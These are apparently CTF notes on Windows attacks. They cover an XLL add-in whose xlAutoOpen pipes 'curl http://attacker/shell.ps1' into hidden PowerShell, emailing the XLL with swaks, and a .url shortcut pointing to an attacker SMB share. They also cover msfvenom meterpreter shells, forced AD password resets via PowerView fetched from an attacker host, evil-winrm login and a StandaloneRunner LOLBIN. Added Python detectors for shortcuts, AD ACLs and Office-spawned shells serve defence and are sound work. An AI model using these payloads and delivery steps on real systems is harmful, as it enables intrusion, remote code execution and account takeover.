CTF Notes: 2024-06-23 XLL RCE, Shortcut URL Injection, Windows Enum
smtp enum
A good way to enumerate an SMTP service is nmap, which ships a built-in script (smtp-commands) that lists the verbs the server advertises.
> nmap --script smtp-commands.nse --script-args smtp-commands.domain=target -pT:25,465,587 target
PORT STATE SERVICE
25/tcp open smtp
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
465/tcp filtered smtps
587/tcp filtered submission
XLL RCE
XLLs are DLLs specifically crafted for Microsoft Excel. To the untrained eye they look a lot like normal Excel documents. XLLs provide a very attractive option for UDA given that they are executed by Microsoft Excel, very commonly encountered software in client networks; as an additional bonus, because they are executed by Excel, the payload will almost assuredly bypass application whitelisting rules, since a trusted application (Excel) is executing it. XLLs can be written in C, C++ or C#, which provides a great deal more flexibility and power (and sanity) than VBA macros and further makes them a desirable choice.
To set up the test environment, follow the steps below:
- Install Visual Studio (VS 2022 was used here). NOTE: the Windows SDK needs to be installed as well.
- Install the Excel XLL SDK: https://learn.microsoft.com/en-us/office/client-developer/excel/welcome-to-the-excel-software-development-kit (the 2013 version was used here).
- Get a copy of https://github.com/edparcell/HelloWorldXll
- Open the solution and set the project to use the latest SDK and project version.
- Switch to a Release build.
- Set the project properties to include the corresponding include and lib folders:
2013_Office_System_Developer_Resources/Excel2013XLLSDK/INCLUDE/
2013_Office_System_Developer_Resources/Excel2013XLLSDK/LIB/x64/XLCALL32.LIB
- Update the code in HelloWorldXll.cpp:
#include "stdafx.h"

// Excel calls xlAutoOpen when the add-in is loaded; returning 1 signals success.
// The payload fetches and runs the PowerShell reverse shell served in the next step.
short __stdcall xlAutoOpen()
{
    system("curl http://attacker/shell.ps1 | powershell -nop -W hidden -noni -ep bypass -f -");
    return 1;
}
- Build the project to get the .xll file.
- Prepare and serve the reverse shell; a PowerShell reverse shell is described here: https://meowmeowattack.github.io/notes/4-shell/
- Send the .xll file to the target via email, or directly if they have an SMTP server open:
> swaks --to test1@target --from test2@target --header "Subject: test" --body "check" --attach @test.xll --server target --port 25
Shortcut URL Injection
- Shortcut URL injection can be achieved as below (PowerShell):
# The target is a UNC path on the attacker's share, written as a file: URL
$url = "file:////attacker/share/shell.exe"
$shortcutPath = "C:\path\shortcut.url"
# .url files are INI-style; Windows resolves the URL= value when the shortcut is opened
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent
- You can generate a reverse shell with msfvenom and serve it from a simple SMB server:
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker LPORT=5555 -f exe > reverse.exe
> impacket-smbserver -smb2support share ./path
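From the defender's side, the injection above leaves a .url file whose URL= value points at a remote file share. The following is an added example (not part of the original notes) that parses the [InternetShortcut] format and flags shortcuts whose target resolves to a remote host; the sample file contents are constructed to match the PowerShell snippet above.

```python
import re
from urllib.parse import urlparse

# Constructed samples: the first is exactly what the PowerShell snippet above writes.
SAMPLE_URL_FILE = "[InternetShortcut]\r\nURL=file:////attacker/share/shell.exe\r\n"
SAMPLE_BENIGN = "[InternetShortcut]\r\nURL=https://intranet.example/wiki\r\n"


def parse_internet_shortcut(text: str) -> dict:
    """Parse the INI-style [InternetShortcut] section into {lowercase key: value}."""
    section, values = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, _, val = line.partition("=")
            values[key.strip().lower()] = val.strip()
    return values


def remote_file_host(url: str):
    """Return the remote host if url names a UNC/file share, else None."""
    url = url.strip()
    if url.startswith("\\\\"):                       # plain UNC: \\host\share\...
        return url[2:].split("\\", 1)[0] or None
    parsed = urlparse(url)
    if parsed.scheme.lower() != "file":
        return None
    host = parsed.netloc                              # file://host/share form
    if not host:
        m = re.match(r"^/{2,}([^/]+)", parsed.path)   # file:////host/share form
        host = m.group(1) if m else ""
    # Empty host, localhost, or a drive letter (file://C:/...) means a local path.
    if not host or host.lower() == "localhost" or re.fullmatch(r"[A-Za-z]:", host):
        return None
    return host


def flag_shortcut(text: str):
    """Return (is_suspicious, target_url) for the content of one .url file."""
    target = parse_internet_shortcut(text).get("url", "")
    return remote_file_host(target) is not None, target


if __name__ == "__main__":
    for sample in (SAMPLE_URL_FILE, SAMPLE_BENIGN):
        print(flag_shortcut(sample))
```

Run over a directory of .url files (for example from user profiles or an attachment quarantine), the remote host is the value to correlate with proxy and SMB logs.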
ForceChangePassword
On Windows (especially in an AD environment), a user may be able to change another user’s password via the user’s (or a group’s) permissions on the target object. More specifically, check for the following permissions:
- GenericAll
- AllExtendedRights
- User-Force-Change-Password
These can be found by collecting data with SharpHound (https://github.com/BloodHoundAD/SharpHound) and running BloodHound (https://github.com/BloodHoundAD/BloodHound) locally to analyse the AD forest:
> SharpHound.exe -c All --zipfilename output.zip
# on Kali, set up BloodHound
> apt install bloodhound neo4j
> python3 -m pip install bloodhound
# run (default credentials neo4j:neo4j)
> neo4j console
> bloodhound --no-sandbox
If any of the above-mentioned permissions are found, you can change the target user’s password via PowerView: https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
# fetch and load PowerView
Invoke-WebRequest -URI http://attacker/PowerView.ps1 -OutFile PowerView.ps1
Import-Module .\PowerView.ps1
# reset the victim's password (requires one of the rights listed above)
$pass = ConvertTo-SecureString 'password123!@#' -AsPlainText -Force
Set-DomainUserPassword -Identity victim -AccountPassword $pass
Now you can log in as the victim user, if PowerShell remoting is enabled for that user:
> evil-winrm -i target -u victim -p 'password123!@#'
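The three rights above are what BloodHound reports as a ForceChangePassword edge. The following is an added example (not part of the original notes or of BloodHound/PowerView) that classifies ACEs on a user object by those rights, so an AD admin can audit who can reset a given account. The ACE dictionaries and the `expected` set of legitimate principals are constructed assumptions; the access-mask bits and the User-Force-Change-Password GUID are the real AD values.

```python
import uuid

# Access-mask bits from the AD ACE format.
GENERIC_ALL = 0x10000000
DS_CONTROL_ACCESS = 0x00000100          # extended right; ObjectType narrows it
# Well-known extended-right GUID for User-Force-Change-Password.
FORCE_CHANGE_PASSWORD = uuid.UUID("00299570-246d-11d0-a768-00aa006e0529")
NULL_GUID = uuid.UUID(int=0)            # no ObjectType = all extended rights


def reset_right(mask: int, object_type=NULL_GUID):
    """Name the password-reset-capable right an access mask grants, or None."""
    if mask & GENERIC_ALL:
        return "GenericAll"
    if mask & DS_CONTROL_ACCESS:
        if object_type == NULL_GUID:
            return "AllExtendedRights"
        if object_type == FORCE_CHANGE_PASSWORD:
            return "User-Force-Change-Password"
    return None


def who_can_reset(acl, expected=frozenset()):
    """Return {trustee: right} for principals outside the expected admin set.

    Simplified triage: a deny ACE for the same trustee and right cancels the
    allow; a real DACL evaluation also considers ordering and inheritance.
    """
    denied = set()
    for ace in acl:
        right = reset_right(ace["mask"], ace.get("object_type", NULL_GUID))
        if right and ace["type"] == "deny":
            denied.add((ace["trustee"], right))
    findings = {}
    for ace in acl:
        right = reset_right(ace["mask"], ace.get("object_type", NULL_GUID))
        if (right and ace["type"] == "allow" and ace["trustee"] not in expected
                and (ace["trustee"], right) not in denied):
            findings[ace["trustee"]] = right
    return findings


# Constructed sample ACL on the 'victim' user object (field names are assumed).
SAMPLE_ACL = [
    {"trustee": "NT AUTHORITY\\SYSTEM", "type": "allow", "mask": GENERIC_ALL},
    {"trustee": "CONTOSO\\helpdesk", "type": "allow", "mask": DS_CONTROL_ACCESS,
     "object_type": FORCE_CHANGE_PASSWORD},
    {"trustee": "CONTOSO\\svc-backup", "type": "allow", "mask": DS_CONTROL_ACCESS},
    {"trustee": "CONTOSO\\interns", "type": "allow", "mask": DS_CONTROL_ACCESS,
     "object_type": FORCE_CHANGE_PASSWORD},
    {"trustee": "CONTOSO\\interns", "type": "deny", "mask": DS_CONTROL_ACCESS,
     "object_type": FORCE_CHANGE_PASSWORD},
    {"trustee": "CONTOSO\\jdoe", "type": "allow", "mask": 0x20},   # unrelated right
]

if __name__ == "__main__":
    print(who_can_reset(SAMPLE_ACL, expected={"NT AUTHORITY\\SYSTEM"}))
```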
StandaloneRunner.exe
StandaloneRunner.exe is a utility included with the Windows Driver Kit (WDK) used for testing and debugging drivers on Windows systems. It allows developers to execute and debug driver packages in a standalone environment without needing to install them on a target system. The binary can often be found at the following paths:
C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\arm\standalonerunner.exe
C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\arm64\standalonerunner.exe
C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe
C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x86\standalonerunner.exe
- StandaloneRunner.exe has an arbitrary code execution vulnerability and can be abused as a LOLBIN.
- Read more here: https://github.com/nasbench/Misc-Research/blob/main/LOLBINs/StandaloneRunner.md
# copy standalonerunner.exe and standalonexml.dll to a directory
copy "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe" standalonerunner.exe
copy "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.dll" standalonerunner.dll
# Create a file named reboot.rsf in the same directory and fill with some content
echo testdir > reboot.rsf
echo True >> reboot.rsf
# Create the required folder structure
mkdir testdir
mkdir testdir\working
# create a rsf.rsf file in the working directory
echo 1 > testdir\working\rsf.rsf
# Create a command.txt file in the current directory and fill it with the command to execute
echo "c:\temp\shell.exe" > command.txt
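Both the XLL payload above (Excel spawning a shell that pipes curl into a hidden PowerShell) and the StandaloneRunner technique (a WDK binary copied out of its install tree) show up in process-creation telemetry. The following is an added example, not part of the original notes, with detection logic run over constructed Sysmon Event ID 1 style events; the field names (ParentImage, Image, CommandLine), rule names and sample paths are assumptions.

```python
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "curl.exe", "certutil.exe"}
# Legitimate install tree from the paths listed above; elsewhere means a copied LOLBIN.
WDK_DIR = "\\windows kits\\10\\testing\\standalonetesting\\"
# Arguments the XLL payload above uses to run PowerShell quietly.
STEALTH_ARGS = ("-ep bypass", "-executionpolicy bypass", "-w hidden",
                "-windowstyle hidden", "-nop", "-noni")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the names of all rules the event matches (empty list if benign)."""
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    cmd = event["CommandLine"].lower()
    hits = []
    # Rule 1: Office spawning a shell or downloader (what system() in xlAutoOpen does).
    if parent in OFFICE_PARENTS and image in SHELLS:
        hits.append("office_spawned_shell")
    # Rule 2: an Office child carrying hidden/bypass PowerShell switches.
    if parent in OFFICE_PARENTS and any(a in cmd for a in STEALTH_ARGS):
        hits.append("office_child_stealth_args")
    # Rule 3: standalonerunner.exe executed from outside the WDK install tree.
    if image == "standalonerunner.exe" and WDK_DIR not in event["Image"].lower():
        hits.append("standalonerunner_outside_wdk")
    return hits


def scan(events) -> list:
    """Classify every event; returns one hit list per event, in order."""
    return [classify(e) for e in events]


# Constructed sample events: XLL payload, copied LOLBIN, legitimate WDK use, benign Excel child.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c curl http://attacker/shell.ps1 | powershell -nop -W hidden -noni -ep bypass -f -"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Users\victim\Desktop\standalonerunner.exe", "CommandLine": "standalonerunner.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe",
     "CommandLine": "standalonerunner.exe"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": r"C:\Windows\splwow64.exe 12288"},
]

if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(basename(event["Image"]), hits)
```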
Windows folder/file enum by keyword
To locate file/folder permissions that mention a certain keyword (for example a user or group name), one can use the following command:
> ICACLS "C:\*." /T /C 2>$null | findstr "keyword"